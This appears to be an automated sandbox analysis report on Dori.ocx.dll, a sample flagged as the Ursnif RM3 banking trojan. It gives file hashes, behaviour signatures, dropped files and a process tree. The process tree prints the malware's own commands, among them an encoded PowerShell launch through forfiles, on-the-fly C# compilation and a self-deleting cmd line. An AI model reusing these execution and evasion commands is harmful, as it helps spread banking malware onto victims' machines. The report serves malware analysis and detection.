Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-11-2020 10:50

General

  • Target

    Dori.ocx.dll

  • Size

    141KB

  • MD5

    745868c40e6f1d1d40ae60335417f6d7

  • SHA1

    cfe42b4014fc22596b4305271c4a133492603349

  • SHA256

    7a5e4fd35a1a636ef1beb7e62cc647d7e63f5c7aadd2aa1a49d49c81183aca93

  • SHA512

    fae585aa131dfa0c5063991fe13938f73c83d78b43ee142ca39e767ec7db6ec7bb419522b4c0c6c210163b05e95db896388446dd8b70b7a29d4c6fe31d130b18

Malware Config

Signatures

  • Ursnif RM3

    A heavily modified version of Ursnif discovered in the wild.

  • Blacklisted process makes network request 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 105 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SetWindowsHookEx 52 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1192
      • C:\Windows\system32\rundll32.exe
        rundll32.exe C:\Users\Admin\AppData\Local\Temp\Dori.ocx.dll,#1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1032
        • C:\Windows\SysWOW64\rundll32.exe
          rundll32.exe C:\Users\Admin\AppData\Local\Temp\Dori.ocx.dll,#1
          3⤵
          • Blacklisted process makes network request
          PID:1596
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1264
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:748
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwASQBkAGUAbgB0AGkAdAB5AHcAbwByACcAKQAuAEQA
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1312
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\np4dcq2f\np4dcq2f.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1332
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7BA5.tmp" "c:\Users\Admin\AppData\Local\Temp\np4dcq2f\CSC77967A9CD3C4438C813CAAD94155211.TMP"
                  7⤵
                    PID:940
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\diz55elw\diz55elw.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1068
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D0C.tmp" "c:\Users\Admin\AppData\Local\Temp\diz55elw\CSCF909F4B0D455473CA0407E512F2C873.TMP"
                    7⤵
                      PID:1656
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\Users\Admin\AppData\Local\Temp\Dori.ocx.dll"
            2⤵
            • Deletes itself
            • Suspicious use of WriteProcessMemory
            PID:932
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              3⤵
              • Delays execution with timeout.exe
              PID:1636
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1832 CREDAT:275457 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:636
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1724 CREDAT:275457 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:556
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1212
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1212 CREDAT:275457 /prefetch:2
            2⤵
            • Suspicious use of SetWindowsHookEx
            PID:1584
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1212 CREDAT:3159045 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:984

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
          MD5

          a69fba04d9b13e82fb772d1b38b6054a

          SHA1

          f7ab8c1d32ddc58e13f65f9b8bb0cc844f164454

          SHA256

          733d04f9d9e1fdf85914f097cca3f8bfb3926c38a7ccf69e7c74d887abbc64ff

          SHA512

          6fae50c73cc08c48d5ecb6814785f82c46ded1dc00ba9a8b02a9b2bd907a10bba6015e0a5753487a12765db242162ce4f822bf5d3381a71ae2143c9f5d34669a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          MD5

          4620d50f79ec1cca42a690528595a9b1

          SHA1

          47a728d0560971b261121052c798ce9182a1dac7

          SHA256

          862ffccb24f35a8703eb7930b7a57e9889c9d2aa60341e0c098e29abfb383b72

          SHA512

          4079db4a2b93cac8a14dcf31d01ba11e4010ccd565a322f79103ffef0ceac0abe76551e9ce0aef97ab7fc0c9aa536bba5d7c5bd9f07c63544c846d8102a0678c

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
          MD5

          d2114a22d73ae21cd74d842fbd99c000

          SHA1

          6f299b5ca42485c4ae15143ae9867e10d4872411

          SHA256

          a74954ec5c0c36911da88c29f41e2dc6b81f15a1263e538643831aa88dcfc616

          SHA512

          aaaa60f3d2334af22fa049ef5f3d87b57334309181ff71eaf61ad7af798c37f5611442c5f7ba7d9f9ca6553cb25d3e99d76a37cc176c222e12fdb8ea0e56cfca

        • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat
          MD5

          0220e6c784cc3d09f399ee39cd703709

          SHA1

          3c2db917a9974e0e139361179a5c25ce549e4e42

          SHA256

          49913545df4969aacb6660ef2de5109e9d63a20813854cb7d014c3f5650ca275

          SHA512

          9b0d386f49b5b5de469cc4eefbf501c751bf5575802af35040784f543c10f0dd23619292446b3a543f9185d0b39b261c1459967987f4283e9274217741c7769e

        • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat
          MD5

          fa5e036a4f2a150e17e4525c7245612b

          SHA1

          7725ef1b0e720634c26b53ba70bb9046c10c4185

          SHA256

          c192ab6aabe05801ee676b923bc231c6d1b9f7887481950b1c802cf726338c76

          SHA512

          1f65e60060ddd171664599ebd31b074714f5c71ad6fe398b6d3a3309563c8c938943f8d5447da9c9704938f2f21f9ca32d9384d3844197c655e2855165978184

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D73194RS\favicon[1].ico
          MD5

          a976d227e5d1dcf62f5f7e623211dd1b

          SHA1

          a2a9dc1abdd3d888484678663928cb024c359ee6

          SHA256

          66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271

          SHA512

          6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

        • C:\Users\Admin\AppData\Local\Temp\RES7BA5.tmp
          MD5

          6eb960e3661cdfaa471359defc671637

          SHA1

          b1158b78ead355b3ab181d5994ed139a5f759f55

          SHA256

          76baa745e71721764bf441c9d885f916d0f4d9f4866ffadcefa939d20954119c

          SHA512

          8d1d4a1be2139426bea5e32f020993c06bcc14c0a731ec09d526131464d2c3336178106f95043cbc2e8355687ed77dc1892ccba48255d888de6e8517cb8979fd

        • C:\Users\Admin\AppData\Local\Temp\RES7D0C.tmp
          MD5

          a7ef42e3ece9345d31849090ea19248d

          SHA1

          85b1dba45b622f28999dd6ac9766a6ba53692c1e

          SHA256

          849513d9544401dafac572e1a81ba01b40b2b32abc5793ad1e72a3f4e4518902

          SHA512

          06c0e70b43363ff3a9510428ca9f10247aa95bde612350aca458d45a0b65cc38dbef89b0af5a0ecf6631b3bd4a694fd22a2e1b2c3497aca80b61722133e152d3

        • C:\Users\Admin\AppData\Local\Temp\diz55elw\diz55elw.dll
          MD5

          9f0bfbd342091675207307e7ada38e40

          SHA1

          6d89fadcbd9733b11554e921b3bca1a0c1829718

          SHA256

          8edf7f888da3013d028a1b89fd15425b088512f25772d22ab865e1c0fd67cda1

          SHA512

          5bb3dab2237e487bcca4fc910cf819639ab430d6baf552b8cc04208ff9ef4cf1ec1a90979d6ab52fe78e11c05f464b7ae1e328147455091f7a4c8c22a7a57b48

        • C:\Users\Admin\AppData\Local\Temp\np4dcq2f\np4dcq2f.dll
          MD5

          13a58bc41c4e96417836e74be18ff536

          SHA1

          4b24e25ca1442050f1e62977dd3005f7e18c3c2c

          SHA256

          9a3dab5dd82adfbf9a74f8e5d80d4e0fce51481c6c9ef8f4f876277db48a7003

          SHA512

          c5307680539756786ab497b07d63078c622e7013281e973849ee973f7c12d3a1ac617d74e452e2a94ed5be53dff8dbc6e715f66dfff9493dab9a5c3089340585

        • \??\c:\Users\Admin\AppData\Local\Temp\diz55elw\CSCF909F4B0D455473CA0407E512F2C873.TMP
          MD5

          26571e1e5e6d1ff0415e14cf306b2826

          SHA1

          c549602dcb1144fbe9c963a2afcc115095f2643d

          SHA256

          eb7744a7fc13f7465f2f4f095ed7e5a80c011fc8446c9989441c9c3f8be6e626

          SHA512

          7156baa002b4cc69bf8ea4cf3d63d1889d51c952535565e60d70b13ece290687b6d35c8f39496cbcb5ba7e67d8b0922097f1bcb73e60fcd116f86b845f13b924

        • \??\c:\Users\Admin\AppData\Local\Temp\diz55elw\diz55elw.0.cs
          MD5

          a5043957e07dbe0dee7bb8aad13a403e

          SHA1

          571c9136e0e90d016dd83b24c40eadbf7186c701

          SHA256

          73775570d08cc971668d853274b7c9a0cfb407cf76480747b9e38542e5dc53c9

          SHA512

          14f98e4902059980ed8f46c72fdefeb404f14df0fa06628476d63f9bb9ed76fd6398abd4de8c1de7dfa2a8b2108c31e2b9b668acfc92958c1eecc4a0c8d656a1

        • \??\c:\Users\Admin\AppData\Local\Temp\diz55elw\diz55elw.cmdline
          MD5

          b57e57f81fee4de3258ef43c3af44eba

          SHA1

          31d208b4520e36803326f83a8ac18ba4a62d4ee9

          SHA256

          d3bbf6e039f641fc6cafaed50c738fe4e596edf4258c92419d9f337ea28b38ab

          SHA512

          06a4e601e1290ecb67dbd358feb0985f4804f08fbdc79c71d64302003df0d5c3b4a6e075db4eb309ddf690a7a0544910c2499b374401cddeb91e0560b6a07184

        • \??\c:\Users\Admin\AppData\Local\Temp\np4dcq2f\CSC77967A9CD3C4438C813CAAD94155211.TMP
          MD5

          794bd39b9c64177a349e4571f63e3402

          SHA1

          c470add77dffa70f479f94cfa76cbba95f35cb06

          SHA256

          d12a9fcff4bf17d95befdcb7a96ed49f2013197672934ccf8e96739340b3ce27

          SHA512

          a146b1910e481a7bb7e08d65c99b26f89ea510a4153c3b0bddfbba23a1a01db9a4012141d5448e9daab35c7484f978ba34e61cd585089a31f7d5fcc69988e8b7

        • \??\c:\Users\Admin\AppData\Local\Temp\np4dcq2f\np4dcq2f.0.cs
          MD5

          aee5ecef6b6a9b4372991443276b71ce

          SHA1

          911bd26fba4c5e51423f2c6339cc267f8697f339

          SHA256

          90e03a7c9cb196fd260c54663a4c867f33621ac29746cd8c0a4b2aa9b390754a

          SHA512

          cf99d4941aa5d1a4dd3abd5ca7a4d3d19a7f497c3247fd09505e263a9a4646b81eb19d7a9312b17a00d22ca9881b6d725b76013b7dc470dcc964b77970c96cc3

        • \??\c:\Users\Admin\AppData\Local\Temp\np4dcq2f\np4dcq2f.cmdline
          MD5

          b9fe461420c3e8150781ac83c4e0f8ca

          SHA1

          a9e10bb869b64219970ee26cd9da6b61ad3ed858

          SHA256

          20119febc7ea5907622686cbfa27b1b4732db6a51e2743ced789a74d8caaf62b

          SHA512

          558c3390a2519637219b7236938ab6e0380ce9cc04bcfab1e4ffbd3672a902843b243676e605d3677211b0bab79eec300931716bd1d3d51b1388f84f7e5e5300

        • memory/400-2-0x000007FEF6380000-0x000007FEF65FA000-memory.dmp
          Filesize

          2.5MB

        • memory/556-4-0x0000000000000000-mapping.dmp
        • memory/636-3-0x0000000000000000-mapping.dmp
        • memory/748-104-0x0000000000000000-mapping.dmp
        • memory/940-116-0x0000000000000000-mapping.dmp
        • memory/984-17-0x0000000003100000-0x0000000003101000-memory.dmp
          Filesize

          4KB

        • memory/984-24-0x0000000003100000-0x0000000003101000-memory.dmp
          Filesize

          4KB

        • memory/984-31-0x0000000003100000-0x0000000003101000-memory.dmp
          Filesize

          4KB

        • memory/984-21-0x0000000003100000-0x0000000003101000-memory.dmp
          Filesize

          4KB

        • memory/984-100-0x0000000002C30000-0x0000000002C31000-memory.dmp
          Filesize

          4KB

        • memory/984-26-0x0000000003100000-0x0000000003101000-memory.dmp
          Filesize

          4KB

        • memory/984-12-0x0000000000000000-mapping.dmp
        • memory/984-19-0x0000000003100000-0x0000000003101000-memory.dmp
          Filesize

          4KB

        • memory/984-29-0x0000000003100000-0x0000000003101000-memory.dmp
          Filesize

          4KB

        • memory/1068-121-0x0000000000000000-mapping.dmp
        • memory/1264-103-0x0000000000000000-mapping.dmp
        • memory/1264-102-0x0000000000000000-mapping.dmp
        • memory/1312-112-0x000000001C340000-0x000000001C341000-memory.dmp
          Filesize

          4KB

        • memory/1312-109-0x000000001A840000-0x000000001A841000-memory.dmp
          Filesize

          4KB

        • memory/1312-129-0x000000001B570000-0x000000001B588000-memory.dmp
          Filesize

          96KB

        • memory/1312-128-0x0000000002490000-0x0000000002491000-memory.dmp
          Filesize

          4KB

        • memory/1312-120-0x00000000022F0000-0x00000000022F1000-memory.dmp
          Filesize

          4KB

        • memory/1312-111-0x000000001B6F0000-0x000000001B6F1000-memory.dmp
          Filesize

          4KB

        • memory/1312-110-0x0000000002380000-0x0000000002381000-memory.dmp
          Filesize

          4KB

        • memory/1312-105-0x0000000000000000-mapping.dmp
        • memory/1312-106-0x000007FEF5180000-0x000007FEF5B6C000-memory.dmp
          Filesize

          9.9MB

        • memory/1312-107-0x000000001A9A0000-0x000000001A9A1000-memory.dmp
          Filesize

          4KB

        • memory/1312-108-0x000000001A9E0000-0x000000001A9E1000-memory.dmp
          Filesize

          4KB

        • memory/1332-113-0x0000000000000000-mapping.dmp
        • memory/1584-72-0x0000000002F40000-0x0000000002F41000-memory.dmp
          Filesize

          4KB

        • memory/1584-99-0x0000000002A50000-0x0000000002A52000-memory.dmp
          Filesize

          8KB

        • memory/1584-62-0x0000000002F40000-0x0000000002F41000-memory.dmp
          Filesize

          4KB

        • memory/1584-93-0x0000000002A50000-0x0000000002A51000-memory.dmp
          Filesize

          4KB

        • memory/1584-83-0x0000000002A50000-0x0000000002A51000-memory.dmp
          Filesize

          4KB

        • memory/1584-88-0x0000000002A50000-0x0000000002A51000-memory.dmp
          Filesize

          4KB

        • memory/1584-39-0x0000000002A40000-0x0000000002A41000-memory.dmp
          Filesize

          4KB

        • memory/1584-41-0x0000000002A40000-0x0000000002A41000-memory.dmp
          Filesize

          4KB

        • memory/1584-44-0x0000000002A40000-0x0000000002A41000-memory.dmp
          Filesize

          4KB

        • memory/1584-46-0x0000000002A40000-0x0000000002A41000-memory.dmp
          Filesize

          4KB

        • memory/1584-49-0x0000000002A40000-0x0000000002A41000-memory.dmp
          Filesize

          4KB

        • memory/1584-67-0x0000000002F40000-0x0000000002F41000-memory.dmp
          Filesize

          4KB

        • memory/1584-51-0x0000000002A40000-0x0000000002A41000-memory.dmp
          Filesize

          4KB

        • memory/1584-15-0x0000000002920000-0x0000000002922000-memory.dmp
          Filesize

          8KB

        • memory/1584-14-0x0000000002920000-0x0000000002921000-memory.dmp
          Filesize

          4KB

        • memory/1584-101-0x0000000006250000-0x0000000006273000-memory.dmp
          Filesize

          140KB

        • memory/1584-13-0x0000000002920000-0x0000000002921000-memory.dmp
          Filesize

          4KB

        • memory/1584-10-0x0000000000000000-mapping.dmp
        • memory/1596-1-0x00000000001C0000-0x00000000001D2000-memory.dmp
          Filesize

          72KB

        • memory/1596-0-0x0000000000000000-mapping.dmp
        • memory/1636-130-0x0000000000000000-mapping.dmp
        • memory/1656-124-0x0000000000000000-mapping.dmp